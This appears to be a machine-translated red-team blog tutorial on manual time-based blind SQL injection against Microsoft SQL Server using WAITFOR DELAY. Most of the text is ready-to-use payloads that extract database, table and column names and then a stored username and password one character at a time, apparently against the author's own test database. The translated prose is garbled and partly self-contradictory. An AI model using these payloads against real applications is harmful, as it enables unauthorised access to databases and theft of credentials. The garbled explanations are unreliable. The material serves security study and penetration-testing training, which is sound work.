saulGoodman
A number of offensive and defensive research focused on the public's Red Team
Blind-delay time Microsoft SQL Server hands of Note Note
Delayed implantation Profile
Delay function WAITFOR DELAY
WAITFORIs the Transact-SQL in SQL Server provides ⼀ a flow control statements. Using it is wait for a certain time, and then continue to Perform subsequent statements. It Contains either argument DELAY, Use to specify the time to wait.
If the statement is successful note START, will result in the database records and Web requests will be returned in response to a specific time delay. As the judgment condition statement does not relate to the situation, it is easy to note START success. According to Web requests are 延迟, penetration testing can determine personnel on a website for the existence of vulnerabilities Note START. Also, because the statement does not return specific content, so it is also important to detect Remedies blind bets.
grammar:
WAITFOR DELAY '0:0:n'
⽰例:
WAITFOR DELAY '0:0:4' -- 表⽰延迟4秒
IF exists ()⼦句
grammar:
IF exists () WAITFOR DELAY '0:0:5'
Hand Delay Injection
1. Note START determines whether there
WAITFOR DELAY '0:0:4'
2. guess database name
Guess database name exists
if ((select count(*) from master.dbo.sysdatabases where dbid=5)=1) waitfor delay '0:0:3'--
This statement means it is to determine dibd=6whether the database exists! If there is then 延迟3秒returned!
According dbid guess the name of the library, the first to guess the length
if ((select count(*) from master.dbo.sysdatabases where dbid=5 and len(name)=4)=1) waitfor delay '0:0:3'--
Because I only database I created two databases: test(dbid5), saulgoodman(dbid6)
So I will be able to use the above statement to determine dbid5the length 是否为5, if it is 5then 延迟3秒returned!
Similarly guess dbid6(saulgoodman) in length can use this statement:
if ((select count(*) from master.dbo.sysdatabases where dbid=6 and len(name)=11)=1) waitfor delay '0:0:3'--
If you have more empathy database then the above statement is so like a ~
According dbid queries one by one to query the database name
Because we dbid=4This database is test, then we can guess one by one since his database name:
猜解第一个字符:t
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),1,1)) = 116) WAITFOR DELAY '0:0:3'--
猜解第二个字符:e
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),2,1)) = 101) WAITFOR DELAY '0:0:3'--
猜解第三个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=5),3,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第四个字符:t
If you want to query dbid6the database saulgoodmanso we just 改dbidnumbers like:
猜解第一个字符:s
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),1,1)) = 115) WAITFOR DELAY '0:0:3'--
猜解第二个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),2,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第三个字符:u
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),3,1)) = 117) WAITFOR DELAY '0:0:3'--
猜解第四个字符:l
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),4,1)) = 108) WAITFOR DELAY '0:0:3'--
猜解第五个字符:g
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),5,1)) = 103) WAITFOR DELAY '0:0:3'--
猜解第六个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),6,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第七个字符:o
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),7,1)) = 111) WAITFOR DELAY '0:0:3'--
猜解第八个字符:d
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),8,1)) = 100) WAITFOR DELAY '0:0:3'--
猜解第九个字符:m
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),9,1)) = 109) WAITFOR DELAY '0:0:3'--
猜解第十个字符:a
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),10,1)) = 97) WAITFOR DELAY '0:0:3'--
猜解第十一个字符:n
if (ascii(substring((select top 1 name from master.dbo.sysdatabases where dbid=6),11,1)) = 110) WAITFOR DELAY '0:0:3'--
3. guess the table name
Because we know the database name test, and then we can use the following statement to query the first length of the table name 是否等于5(table name is users):
if ( (select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and len(name)=5)=1) WAITFOR DELAY '0:0:3'--
The figure shows a page 返回正常that it is the table name length 5, then we can guess his character one by one:users
猜解第一个字符:u
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,1,1))=117)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,2,1))=115)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,3,1))=101)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,4,1))=114)=1) WAITFOR DELAY '0:0:3'--
猜解第五个字符:s
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u') and ascii(substring(name,5,1))=115)=1) WAITFOR DELAY '0:0:3'--
Because we know that the database name is testthe first name is a table users, and then we can use the following statement to query the 第二个表名character (table name is info):
猜解第一个字符:i
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,1,1))=105)=1) WAITFOR DELAY '0:0:3'--
猜解第二个字符:n
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,2,1))=110)=1) WAITFOR DELAY '0:0:3'--
猜解第三个字符:f
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,3,1))=102)=1) WAITFOR DELAY '0:0:3'--
猜解第四个字符:o
if ((select count(*) from test.dbo.sysobjects where name in (select top 1 name from test.dbo.sysobjects where xtype='u' and name not in ('users')) and ascii(substring(name,4,1))=111)=1) WAITFOR DELAY '0:0:3'--
4. guess the column name
Because we know the table name users, then we can guess users the column names in the table under the name :( column name is username)
猜解第一个字符:u
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,1,1))=117)) WAITFOR DELAY '0:0:3'--
猜解第二个字符:s
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,2,1))=115)) WAITFOR DELAY '0:0:3'--
猜解第三个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,3,1))=101)) WAITFOR DELAY '0:0:3'--
猜解第四个字符:r
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,4,1))=114)) WAITFOR DELAY '0:0:3'--
猜解第五个字符:n
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,5,1))=110)) WAITFOR DELAY '0:0:3'--
猜解第六个字符:a
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,6,1))=97)) WAITFOR DELAY '0:0:3'--
猜解第七个字符:m
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,7,1))=109)) WAITFOR DELAY '0:0:3'--
猜解第八个字符:e
if (exists(select top 1 name from syscolumns where id =(select id from sysobjects where name = 'users') and unicode(substring(name,8,1))=101)) WAITFOR DELAY '0:0:3'--
This solution out guess the first column name username!
The second way: we have id, username, password, age four columns
:( get the first column is the column name id)
获取第一个字符:i
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),1,1)) =105) WAITFOR DELAY '0:0:3'--
获取第二个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users')),2,1)) =100) WAITFOR DELAY '0:0:3'--
Obtaining a second column is the column name :( username)
获取第一个字符:u
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),1,1)) = 117) WAITFOR DELAY '0:0:3'--
获取第二个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),2,1)) = 115) WAITFOR DELAY '0:0:3'--
获取第三个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),3,1)) = 101) WAITFOR DELAY '0:0:3'--
获取第四个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),4,1)) = 114) WAITFOR DELAY '0:0:3'--
获取第五个字符:n
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),5,1)) = 110) WAITFOR DELAY '0:0:3'--
获取第六个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),6,1)) = 97) WAITFOR DELAY '0:0:3'--
获取第七个字符:m
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),7,1)) = 109) WAITFOR DELAY '0:0:3'--
获取第八个字符:e
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id')),8,1)) = 101) WAITFOR DELAY '0:0:3'--
Gets the third column is the column name :( password)
获取第一个字符:p
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),1,1)) =112) WAITFOR DELAY '0:0:3'--
获取第二个字符:a
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),2,1)) =97) WAITFOR DELAY '0:0:3'--
获取第三个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),3,1)) =115) WAITFOR DELAY '0:0:3'--
获取第四个字符:s
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),4,1)) =115) WAITFOR DELAY '0:0:3'--
获取第五个字符:w
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),5,1)) =119) WAITFOR DELAY '0:0:3'--
获取第六个字符:o
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),6,1)) =111) WAITFOR DELAY '0:0:3'--
获取第七个字符:r
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),7,1)) =114) WAITFOR DELAY '0:0:3'--
获取第八个字符:d
if (ascii(substring((select top 1 name from syscolumns where id=(select id from sysobjects where xtype=0x75 and name='users') and name not in ('id') and name not in ('username')),8,1)) =100) WAITFOR DELAY '0:0:3'--
The data verbatim guess
We know the table name: usersthe column name is: username, passwrdthen we started the burst data: (saul)
判断username列第一个字符:s
if (ascii(substring((select top 1 username from users),1,1)) = 115) WAITFOR DELAY '0:0:3'--
判断username列第二个字符:a
if (ascii(substring((select top 1 username from users),2,1)) = 97) WAITFOR DELAY '0:0:3'--
判断username列第三个字符:u
if (ascii(substring((select top 1 username from users),3,1)) = 117) WAITFOR DELAY '0:0:3'--
判断username列第四个字符:l
if (ascii(substring((select top 1 username from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
This will get to the first user name:saul
Obtain saul passwords :( password is saul520)
判断 password 列第一个字符:s
if (ascii(substring((select top 1 password from users),1,1)) =115) WAITFOR DELAY '0:0:3'--
判断 password 列第二个字符:a
if (ascii(substring((select top 1 password from users),2,1)) =97) WAITFOR DELAY '0:0:3'--
判断 password 列第三个字符:u
if (ascii(substring((select top 1 password from users),3,1)) =117) WAITFOR DELAY '0:0:3'--
判断 password 列第四个字符:l
if (ascii(substring((select top 1 password from users),4,1)) =108) WAITFOR DELAY '0:0:3'--
判断 password 列第五个字符:5
if (ascii(substring((select top 1 password from users),5,1)) =53) WAITFOR DELAY '0:0:3'--
判断 password 列第六个字符:2
if (ascii(substring((select top 1 password from users),6,1)) =50) WAITFOR DELAY '0:0:3'--
判断 password 列第七个字符:0
if (ascii(substring((select top 1 password from users),7,1)) =48) WAITFOR DELAY '0:0:3'--
Since hieroglyphics Mssqlinjection time of manual Boolean blinds on here -
